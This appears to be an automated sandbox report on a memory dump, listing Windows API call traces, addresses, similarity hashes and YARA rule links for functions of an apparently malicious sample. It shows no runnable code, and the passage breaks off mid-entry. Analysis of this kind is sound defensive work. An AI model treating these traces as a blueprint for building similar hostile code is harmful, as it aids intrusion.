Download Yara Rule

APIs

Part of subcall function 0335D448: GetSystemTimeAsFileTime.KERNEL32(0335683A,?,00000000,0335683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0334B059,00000000,74E5F5B0,0335683A), ref: 0335D454
Part of subcall function 0335D448: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 0335D46A
Part of subcall function 0335D448: _snwprintf.NTDLL ref: 0335D48F
Part of subcall function 0335D448: CreateFileMappingW.KERNEL32(000000FF,03371248,00000004,00000000,00001000,?), ref: 0335D4AB
Part of subcall function 0335D448: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 0335D4BD
Part of subcall function 0335D448: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0335D4F5

UnmapViewOfFile.KERNEL32(?,0335683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0334B059,00000000,74E5F5B0,0335683A), ref: 0334A87F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0334A888
SetEvent.KERNEL32(?,0335683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0334B059,00000000,74E5F5B0,0335683A), ref: 0334A8CF
GetLastError.KERNEL32(0335B009,00000000,00000000,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0334A8FE
CloseHandle.KERNEL32(00000000,0335B009,00000000,00000000,?,?,?,?,?,?,?,033477C7,?), ref: 0334A90E

Part of subcall function 0334D44C: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,0334DB20,00000000,00000000,03352461,00000000,00000000,7764DBB0,00000020,00000000), ref: 0334D458
Part of subcall function 0334D44C: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,0334DB20,00000000,00000000,03352461,00000000,00000000,7764DBB0,00000020,00000000), ref: 0334D480
Part of subcall function 0334D44C: memset.NTDLL ref: 0334D492

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: 722c5b5cf0251f969335e1d2a3b611425417a595e82dd0b3ba1f2c80f7fa14ea
Instruction ID: 3d893a589d34e80ff24356dec74dd41cf7affb9be667cd01312b6d1ff27daafd
Opcode Fuzzy Hash: 722c5b5cf0251f969335e1d2a3b611425417a595e82dd0b3ba1f2c80f7fa14ea
Instruction Fuzzy Hash: 0E216D36A44709AFDB21EF75DCC4A5ABBECEF04311F090468E942D7155EB34E9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0334FE9E, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0334D4DC,00000000,?,?), ref: 0334FEBC
GetFileSize.KERNEL32(00000000,00000000,?,?,0334D4DC,00000000,?,?,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0334FECC
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,0334D4DC,00000000,?,?,?,00000000,-00000007,0335F475), ref: 0334FEF8
GetLastError.KERNEL32(?,?,0334D4DC,00000000,?,?,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0334FF1D
CloseHandle.KERNEL32(000000FF,?,?,0334D4DC,00000000,?,?,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0334FF2E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: bb013262dea6331646e0e95917e24349ad553d9184b2eca781c5837a4b6d2c8a
Instruction ID: c717f7c7e3e0f671d4cbc4a11fd7f5962d724fe86a1388d55f525630e4ed24c8
Opcode Fuzzy Hash: bb013262dea6331646e0e95917e24349ad553d9184b2eca781c5837a4b6d2c8a
Instruction Fuzzy Hash: 8B11B472508359BFDB20AF65DCC8AAEFBADEB06360F0D8225F915D7190D731AC408B60

Uniqueness

Uniqueness Score: -1.00%

Function 03347F0A, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 03347F1B
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 03347F34
StrTrimA.SHLWAPI(?,?), ref: 03347F5C
StrTrimA.SHLWAPI(00000000,?), ref: 03347F6B
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 03347FA2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: fcf30dc89a670213c7003d8d20ae1bbc53dede69f91fbbba80b58cdcb922fe71
Instruction ID: e20066ff2ddc6a6cdd5f870aeb8c6367e2298ffd720045883f492ff47fc86a87
Opcode Fuzzy Hash: fcf30dc89a670213c7003d8d20ae1bbc53dede69f91fbbba80b58cdcb922fe71
Instruction Fuzzy Hash: 32116376600316BBD721EB99DCC4F9B7BECEB44750F140121BA29DB184DBB4ED018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03357DDE, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,030D65A8,00000000,03365BA6,?,?,?,033423F4,74E05520,?,03366007,00000000,00000000), ref: 03357E15
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,033423F4,74E05520,?,03366007,00000000,00000000,?,00000000,03365BA6,00000000), ref: 03357E45
RtlEnterCriticalSection.NTDLL(03371460), ref: 03357E54
RtlLeaveCriticalSection.NTDLL(03371460), ref: 03357E72
GetLastError.KERNEL32(?,033423F4,74E05520,?,03366007,00000000,00000000,?,00000000,03365BA6,00000000), ref: 03357E82

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 6cb5efa5c7a6b590b398fd1b91b588ee3dea141ee6443cc41c6a92e001da4f1c
Instruction ID: 4fa9e834569e23e86757d27fe3923a74a663e1c19d14406777a340be9416eb97
Opcode Fuzzy Hash: 6cb5efa5c7a6b590b398fd1b91b588ee3dea141ee6443cc41c6a92e001da4f1c
Instruction Fuzzy Hash: 5E21F8B9600B06AFC721DFA9C9C5946BBF8BB08314B008569EA5AD7710D774E944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03357021, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0335704F
GetLastError.KERNEL32 ref: 03357072
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03357085
GetLastError.KERNEL32 ref: 03357090
HeapFree.KERNEL32(00000000,00000000), ref: 033570D8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 2e842c9b41668e35169ee58cdc8b54340ec7d559f7328d773abc9ed6accabb52
Instruction ID: bd088e406ef0ef1487ba70e645aa3c14c693eb00832c22d86c2e882495039fc6
Opcode Fuzzy Hash: 2e842c9b41668e35169ee58cdc8b54340ec7d559f7328d773abc9ed6accabb52
Instruction Fuzzy Hash: 752147B2500644EFEB21EB61DDC8F5EBBBDEB00318F644458F912979A1C779E984CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0335E476, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(0335CC72,?,?,?,?,00000008,0335CC72,00000000,?), ref: 0335E493
memcpy.NTDLL(0335CC72,?,00000009,?,?,?,?,00000008,0335CC72,00000000,?), ref: 0335E4B5
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0335E4CD
lstrlenW.KERNEL32(00000000,00000001,0335CC72,?,?,?,?,?,?,?,00000008,0335CC72,00000000,?), ref: 0335E4ED
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,0335CC72,00000000,?), ref: 0335E512

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: a7b5a214f9e277ed47b8b080e21382cca2b48c2ca24d0d7ad82c7ae05d3c2e90
Instruction ID: ab45234991e6da52fdc3b885d177c88b117a34e9e1e8d4cf60b74f4931559261
Opcode Fuzzy Hash: a7b5a214f9e277ed47b8b080e21382cca2b48c2ca24d0d7ad82c7ae05d3c2e90
Instruction Fuzzy Hash: 8D11547AE00208BFDB21EBA5DC89FDE7FBDAB08311F008055F915D6284D7389648CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0334C17C, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,?), ref: 0334C1AB
RtlEnterCriticalSection.NTDLL(03371488), ref: 0334C1B8
RtlLeaveCriticalSection.NTDLL(03371488), ref: 0334C1CB
lstrcmpi.KERNEL32(033714A0,00000000), ref: 0334C1EB
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03349162,00000000), ref: 0334C1FF

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID:
API String ID: 1266740956-0
Opcode ID: d3e4095c51f47ae29ba187b395063d05e12784dc00135acc0e4982bab6e79acb
Instruction ID: 11bc5fb8707efd4d66c9ac5b1cb7ef3f72f445b7bcf5df439754d6eb1eec183e
Opcode Fuzzy Hash: d3e4095c51f47ae29ba187b395063d05e12784dc00135acc0e4982bab6e79acb
Instruction Fuzzy Hash: 6F11BE36911209EFDB24DBA9D8C9A99F7FCFF08364F09811AE815D3250D778AD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335EECA, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000008,0334B933,00000000,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000), ref: 0335EED4

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

lstrcpy.KERNEL32(00000000,?), ref: 0335EEF8
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,00000000,74E05520,00000000,?,03346E27,?,?,?,00000000,?), ref: 0335EEFF
lstrcpy.KERNEL32(00000000,?), ref: 0335EF47
lstrcat.KERNEL32(00000000,?), ref: 0335EF56

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: e957bee7d527ae4fe0bfa5bbf5e17b85b55b25572ee7e8e20e36f96490d83ef6
Instruction ID: 48abfc33935334c172ea14eb8c4604dda61d0b1965f1c39039b313ef70648b56
Opcode Fuzzy Hash: e957bee7d527ae4fe0bfa5bbf5e17b85b55b25572ee7e8e20e36f96490d83ef6
Instruction Fuzzy Hash: 1511C6371042069BD731EB66ECC8FABBBECAB85341F094629F915C7144DB34DA49C721

Uniqueness

Uniqueness Score: -1.00%

Function 0335B1DC, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0335B2AA: lstrlen.KERNEL32(00000000,00000000,?,00000000,0335F438,00000000,00000000,?,?,?,03348FDB,?,?,00000000), ref: 0335B2B6

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0335B205
memcpy.NTDLL(00000000,?,?), ref: 0335B218
RtlEnterCriticalSection.NTDLL(03371488), ref: 0335B229
RtlLeaveCriticalSection.NTDLL(03371488), ref: 0335B23E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0335B276

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: aed51597adbd21c7d107367bd97a3a07e3af02e746db070a978da120c5c1b91f
Instruction ID: ba64b67592d5f64b0305d83e5456bf45cb49eb391014844d4dfa31c2f9381f80
Opcode Fuzzy Hash: aed51597adbd21c7d107367bd97a3a07e3af02e746db070a978da120c5c1b91f
Instruction Fuzzy Hash: 4A11CE7A904211EFC720AF25DCC9C6FBBBCEB86321B09412AFD1597214CB399C458BB1

Uniqueness

Uniqueness Score: -1.00%

Function 03365C2F, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,000000FF,?,0334D354,?,?,00000000), ref: 03365C45
lstrlen.KERNEL32(?,?,0334D354,?,?,00000000), ref: 03365C4C
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 03365C5A

Part of subcall function 033528BD: GetLocalTime.KERNEL32(?), ref: 033528C7
Part of subcall function 033528BD: wsprintfA.USER32 ref: 033528FA

wsprintfA.USER32 ref: 03365C7C

Part of subcall function 0335ACA4: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,03365CA4,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0335ACC2
Part of subcall function 0335ACA4: wsprintfA.USER32 ref: 0335ACE7

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 03365CAD

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID:
API String ID: 3847261958-0
Opcode ID: 5f1b47a73efbddbb140171916692bc51bb2598ab5217870bd15c9f4e11986926
Instruction ID: a035685f142ad52b54343839240680e43f97dc93a4db09f4055211f180e6cefb
Opcode Fuzzy Hash: 5f1b47a73efbddbb140171916692bc51bb2598ab5217870bd15c9f4e11986926
Instruction Fuzzy Hash: 4F01C436540218BFDB216F26DC84DABBF2DEF81361F048022FD1896124D6368925DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03353E2B, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 03353E42

Part of subcall function 03368AFB: wcstombs.NTDLL ref: 03368BBB

lstrlen.KERNEL32(?,?,?,?,?,0335620C,?,?), ref: 03353E65
lstrlen.KERNEL32(?,?,?,?,0335620C,?,?), ref: 03353E6F
memcpy.NTDLL(?,?,00004000,?,?,0335620C,?,?), ref: 03353E80
HeapFree.KERNEL32(00000000,?,?,?,?,0335620C,?,?), ref: 03353EA2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID:
API String ID: 1256246205-0
Opcode ID: cc7bd1daf50e13296b68835711fd5b3f0d4e65c187cf3a35d00d1abcc6433d63
Instruction ID: cc8fccf4de062cfe04555890c06361a4460b6176f9e449259c33c69c7df301f2
Opcode Fuzzy Hash: cc7bd1daf50e13296b68835711fd5b3f0d4e65c187cf3a35d00d1abcc6433d63
Instruction Fuzzy Hash: 4F11397A940604EFCB22AB55DCC5F5ABBF9EB85360F208069F945A6220E7359D149B20

Uniqueness

Uniqueness Score: -1.00%

Function 03356C9D, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0335A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0334D4C8,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0335A415
Part of subcall function 0335A406: mbstowcs.NTDLL ref: 0335A431

lstrlenW.KERNEL32(00000000,74E5F560,00000000,?,00000000), ref: 03356CC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 03356CDB
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03356CF8
lstrlenW.KERNEL32(00000000), ref: 03356D04
HeapFree.KERNEL32(00000000,00000000), ref: 03356D18

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID:
API String ID: 3403466626-0
Opcode ID: 3a26683d2811e0547c0a9008d48f09321e62dc6a358866327051b926aba5a6bc
Instruction ID: 5e409614b43c02c1ed33ec92301b90da4a2a7f08f53995133f6dcd92d62d8b1b
Opcode Fuzzy Hash: 3a26683d2811e0547c0a9008d48f09321e62dc6a358866327051b926aba5a6bc
Instruction Fuzzy Hash: 89018C76500604FFC321AB99DCC9F9EBBECEB08314F104015FA05DB254DBB899048F65

Uniqueness

Uniqueness Score: -1.00%

Function 033508EC, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0335090C
GetModuleHandleA.KERNEL32 ref: 0335091A
LoadLibraryExW.KERNEL32(?,?,?), ref: 03350927
GetModuleHandleA.KERNEL32 ref: 0335093E
GetModuleHandleA.KERNEL32 ref: 0335094A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 261cbcf24448ffbf302d862cbf85e3ff64fa7ab7f014c69cf1809651b1d51386
Instruction ID: 814343e38dda9d514fc19a2d9b22ec6806d8651337791ff639944b36b474209b
Opcode Fuzzy Hash: 261cbcf24448ffbf302d862cbf85e3ff64fa7ab7f014c69cf1809651b1d51386
Instruction Fuzzy Hash: F901623161030AAFEB15AF6AECC0D5A7B9DEF05360B084136FD14D2129DB72C8219E90

Uniqueness

Uniqueness Score: -1.00%

Function 03358A46, Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,03355396), ref: 03358A4C
StrTrimA.SHLWAPI(00000001,?,?,03355396), ref: 03358A6F
StrTrimA.SHLWAPI(00000000,?,?,03355396), ref: 03358A7E
_strupr.NTDLL ref: 03358A81
lstrlen.KERNEL32(00000000,03355396), ref: 03358A89

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Trim$_struprlstrlen
String ID:
API String ID: 2280331511-0
Opcode ID: aeec75755c079700b082a2f04f9f0d44493d9866f10ce60f1fdc3a805dadc80f
Instruction ID: ef8e45247b2cefeed0f4a25ace19feac607098096976e010a5cc5cf72cbd907e
Opcode Fuzzy Hash: aeec75755c079700b082a2f04f9f0d44493d9866f10ce60f1fdc3a805dadc80f
Instruction Fuzzy Hash: 98F04F766001159FE625EB65ECC9F3E77ACEB46755F104018F806CB288DB18AD018761

Uniqueness

Uniqueness Score: -1.00%

Function 03347C9C, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03371460), ref: 03347CA7
RtlLeaveCriticalSection.NTDLL(03371460), ref: 03347CB8
VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,0335E54F,?,?,03371488,0334235E,00000003), ref: 03347CCF
VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,0335E54F,?,?,03371488,0334235E,00000003), ref: 03347CE9
GetLastError.KERNEL32(?,?,0335E54F,?,?,03371488,0334235E,00000003), ref: 03347CF6

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 637bdaef238a6aa8fe2b05bfc69dd1a8afe80ee48f6b22eaae65778ebb7373a1
Instruction ID: 31de95eff19b9d0d4a95611709991334ed5e6d57c596123257a56ca46cb0f0e8
Opcode Fuzzy Hash: 637bdaef238a6aa8fe2b05bfc69dd1a8afe80ee48f6b22eaae65778ebb7373a1
Instruction Fuzzy Hash: C1017C79200704EFD7219B25CC84D6ABBB9EB84320B108119EA6693690D730E902CF20

Uniqueness

Uniqueness Score: -1.00%

Function 03368815, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03354270,?), ref: 0336881D
GetVersion.KERNEL32 ref: 0336882C
GetCurrentProcessId.KERNEL32 ref: 03368848
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03368865
GetLastError.KERNEL32 ref: 03368884

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: a1805e5d1c4450ca7a3b687b0dc23a7538f7ab6a2b805d85cd880d02c43bb7fe
Instruction ID: 59373f31dc645399f05f9c89dfa3b9ab10a48b021c08d00184a5493fa180f4ae
Opcode Fuzzy Hash: a1805e5d1c4450ca7a3b687b0dc23a7538f7ab6a2b805d85cd880d02c43bb7fe
Instruction Fuzzy Hash: ECF0AFB2A40302EFD734BB21ACC9B187BADB748786F048615E522DE1CCD7708040CF14

Uniqueness

Uniqueness Score: -1.00%

Function 03350966, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03350973
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 03350983
CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 0335098C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,0334825B,?,?,00000040), ref: 033509AA
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,0334825B,?,?,00000040), ref: 033509B7

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
String ID:
API String ID: 3667519916-0
Opcode ID: a81b03998edb68a6e89fecb96f4c76eea5f30094f7ca144aecdaab1656e327a5
Instruction ID: b2abe984dc3d010f109b6ff5a73f407c866d07154b5df09367d2b61c517bbe43
Opcode Fuzzy Hash: a81b03998edb68a6e89fecb96f4c76eea5f30094f7ca144aecdaab1656e327a5
Instruction Fuzzy Hash: 61F03A75204B04AFEB20AB66DCC8F1AF6ACEF44311F188618F951D25A4DB25E845CE24

Uniqueness

Uniqueness Score: -1.00%

Function 03345B1E, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 03345B42

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

wsprintfA.USER32 ref: 03345B73

Part of subcall function 0334B2BF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0334ACC7), ref: 0334B2D5
Part of subcall function 0334B2BF: wsprintfA.USER32 ref: 0334B2FD
Part of subcall function 0334B2BF: lstrlen.KERNEL32(?), ref: 0334B30C
Part of subcall function 0334B2BF: wsprintfA.USER32 ref: 0334B34C
Part of subcall function 0334B2BF: wsprintfA.USER32 ref: 0334B381
Part of subcall function 0334B2BF: memcpy.NTDLL(00000000,?,?), ref: 0334B38E
Part of subcall function 0334B2BF: memcpy.NTDLL(00000008,0336B3F8,00000002,00000000,?,?), ref: 0334B3A3
Part of subcall function 0334B2BF: wsprintfA.USER32 ref: 0334B3C6

HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 03345BE8

Part of subcall function 03368D97: RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 03368DAD
Part of subcall function 03368D97: RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 03368DC8

HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 03345BD2
HeapFree.KERNEL32(00000000,?), ref: 03345BDE

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID:
API String ID: 3553201432-0
Opcode ID: f629e61dcdb57b0171ae05112474735ab0efa64f9cb6551a940f496a5ea776c3
Instruction ID: 27765b6fd1cf16ab55f1110b9072e23a65dc84801e3e25c0a8adfa7d7fdb823e
Opcode Fuzzy Hash: f629e61dcdb57b0171ae05112474735ab0efa64f9cb6551a940f496a5ea776c3
Instruction Fuzzy Hash: 4621F376800249AFCF21EFA5DC84C9F7BBDFB49300F04441AF915AA120D771AA64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335AD60, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 03356BBB: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 03356BD6
Part of subcall function 03356BBB: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 03356C24
Part of subcall function 03356BBB: GetProcAddress.KERNEL32(00000000,?), ref: 03356C3D
Part of subcall function 03356BBB: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 03356C8E

GetLastError.KERNEL32(?,?,00000001), ref: 0335AEEE
FreeLibrary.KERNEL32(?,?,00000001), ref: 0335AF56

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: f757bb7763006c11604b113ad8b31d0335567506c2db430dee7869de54583f6a
Instruction ID: 1302bcc1a3ac474631d30d674a08490e91567bb7be794f5b4ee5dbfa48ce7201
Opcode Fuzzy Hash: f757bb7763006c11604b113ad8b31d0335567506c2db430dee7869de54583f6a
Instruction Fuzzy Hash: AE71A3B5D00209EFCF11DFA5C8C4DAEBBB9FF48304B1486A9E915AB260D735A941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 03345BFD, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03345CB0
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03345CC6
memset.NTDLL ref: 03345D6F
memset.NTDLL ref: 03345D85

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 8b15626d0b2d458d804aea1b9fee58bf99bc79bab25ba96de9f0b8e911561428
Instruction ID: 4322697c691a85a807d61dec9aadb7e51756e89c9161291c95084a8adbb7a7e3
Opcode Fuzzy Hash: 8b15626d0b2d458d804aea1b9fee58bf99bc79bab25ba96de9f0b8e911561428
Instruction Fuzzy Hash: 68417375E00319AFEB10DF68CCC4BDE77A9EF46310F108569B915AB280DB70AE448F90

Uniqueness

Uniqueness Score: -1.00%

Function 0335C6A8, Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 0335C6EF
_strupr.NTDLL ref: 0335C744
_strupr.NTDLL ref: 0335C783
_strupr.NTDLL ref: 0335C7BD

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 10c4b14ebbf6d160faa9667721ab7c4edcb1c7a484fa6135d16c8b8fc127950a
Instruction ID: c35cafa78eed4188c22fd70f4a1c352eb3469bb30f460ca6ee21f30ea221e316
Opcode Fuzzy Hash: 10c4b14ebbf6d160faa9667721ab7c4edcb1c7a484fa6135d16c8b8fc127950a
Instruction Fuzzy Hash: 0B418BB580031A9EDF20EFA4DCD8EEEB7A9FF04254F155821F825CA410E774E844CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03347979, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03347A99

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetLastError.KERNEL32 ref: 03347A0D
WaitForSingleObject.KERNEL32(00000000), ref: 03347A1D
GetLastError.KERNEL32 ref: 03347A3D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
